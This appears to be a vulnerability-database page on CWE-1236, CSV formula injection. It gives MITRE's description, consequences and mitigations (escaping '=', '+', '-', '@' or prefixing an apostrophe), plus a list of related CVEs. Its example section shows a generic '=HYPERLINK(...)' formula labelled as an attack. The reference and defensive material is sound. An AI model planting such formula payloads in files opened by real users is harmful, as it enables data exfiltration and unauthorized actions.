Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-1236 — Vulnerability Class 128

128 vulnerabilities classified as CWE-1236. AI Chinese analysis included.

CWE-1236 represents a critical input validation weakness where applications fail to properly sanitize user-supplied data before writing it to Comma-Separated Values (CSV) files. This vulnerability is typically exploited by attackers injecting malicious formula elements, such as those starting with equals signs or plus signs, directly into the CSV content. When a victim opens the compromised file in a spreadsheet application like Microsoft Excel, the software interprets these characters as executable commands rather than plain text, potentially triggering remote code execution, data exfiltration, or unauthorized actions. To mitigate this risk, developers must implement robust neutralization strategies, specifically prefixing dangerous characters with single quotes or escaping them appropriately during the serialization process. By ensuring that all user-generated content is treated strictly as data and not as executable instructions, organizations can effectively prevent formula injection attacks and maintain the integrity of their data exchange mechanisms.

MITRE CWE Description
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common Consequences (1)
ConfidentialityRead Application Data, Execute Unauthorized Code or Commands
Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Mitigations (3)
ImplementationWhen generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Effectiveness: Moderate
ImplementationIf a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Effectiveness: Moderate
Architecture and DesignCertain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
Effectiveness: Limited
Examples (1)
Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '='
=HYPERLINK(link_location, [friendly_name])
Attack · Other
HYPERLINK(link_location, [friendly_name])
Good · Other
CVE IDTitleCVSSSeverityPublished
CVE-2023-25611 Fortinet FortiAnalyzer 安全漏洞 — FortiAnalyzer 4.0 Medium2023-03-07
CVE-2022-35281 IBM Maximo Application Suite command injection — Maximo Asset Management 5.5 Medium2023-01-06
CVE-2022-4034 Appointment Hour Booking <= 1.3.72 - CSV Injection — Appointment Hour Booking – Booking Calendar 5.8 Medium2022-11-29
CVE-2022-41675 TEAM JOHNLONG SOFTWARE CO., LTD. MAILD Mail Server - Formula Injection — MAILD Mail Server 8.0 High2022-11-29
CVE-2022-3574 WPForms Pro < 1.7.7 - CSV Injection — WPForms Pro 9.8 -2022-11-14
CVE-2022-27858 WordPress Activity Log plugin <= 2.8.3 - CSV Injection vulnerability — Activity Log (WordPress plugin) 7.4 High2022-11-08
CVE-2022-3463 FluentForm < 4.3.13 - CSV Injection — Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms 8.8 -2022-11-07
CVE-2022-3558 Import and export users and customers < 1.20.5 - Subscriber+ CSV Injection — Import and export users and customers 8.0 -2022-11-07
CVE-2022-40294 CSV Injection in PHP Point of Sale version 19.0, by PHP Point of Sale, LLC — PHP Point of Sale 8.8 -2022-10-31
CVE-2022-3393 Post to CSV by BestWebSoft <= 1.4.0 - Author+ CSV Injection — Post to CSV by BestWebSoft 8.8 -2022-10-25
CVE-2022-2798 Affiliates Manager < 2.9.14 - Affiliate CSV Injection — Affiliates Manager 8.0 -2022-09-16
CVE-2022-1194 Mobile Events Manager < 1.4.8 - Admin+ CSV Injection — Mobile Events Manager 8.0 -2022-09-16
CVE-2022-3026 WP Users Exporter <= 1.4.2 - CSV Injection — WP Users Exporter 6.5 Medium2022-09-06
CVE-2022-2240 Request a Quote <= 2.3.7 - CSV Injection — Request a Quote 8.8 -2022-07-25
CVE-2022-1539 Exports and Reports < 0.9.2 - Contributor+ CSV Injection — Exports and Reports 8.8 -2022-07-25
CVE-2022-2112 Improper Neutralization of Formula Elements in a CSV File in inventree/inventree — inventree/inventree 8.8 -2022-06-17
CVE-2022-1202 WP-CRM <= 1.2.1 - CSV Injection — WP-CRM – Customer Relations Management for WordPress 7.8 -2022-06-13
CVE-2022-2027 Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra — kromitgmbh/titra 8.8 -2022-06-08
CVE-2022-26867 Dell EMC PowerStore 安全漏洞 — PowerStore 5.9 Medium2022-06-02
CVE-2022-1544 Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers — luyadev/yii-helpers 7.8 -2022-05-01
CVE-2021-23286 Security issues in Eaton Intelligent Power Manager Infrastructure — Intelligent Power Manager Infrastructure (IPM Infrastructure) 5.7 Medium2022-04-18
CVE-2022-0142 Visual Form Builder < 3.0.6 - CSV Injection — Visual Form Builder 9.8 -2022-04-12
CVE-2022-24770 Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging — gradio 8.8 High2022-03-17
CVE-2022-22689 CA Harvest Software Change Manager 安全漏洞 — CA Harvest Software Change Manager 8.8 -2022-02-04
CVE-2022-22121 NocoDB - CSV Injection in User Management — nocodb 8.0 High2022-01-10
CVE-2021-41270 CSV Injection in Symfony — symfony 6.5 Medium2021-11-24
CVE-2021-38424 Delta Electronics DIALink — DIALink 5.9 Medium2021-11-03
CVE-2020-36503 Connections Business Directory < 9.7 - Admin+ CSV Injection — Connections Business Directory 8.0 -2021-11-01
CVE-2021-38180 SAP Business One 安全漏洞 — SAP Business One 8.8 -2021-10-12
CVE-2021-25960 SuiteCRM - CSV Injection in Accounts Module — SuiteCRM 8.0 High2021-09-29

Vulnerabilities classified as CWE-1236 represent 128 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.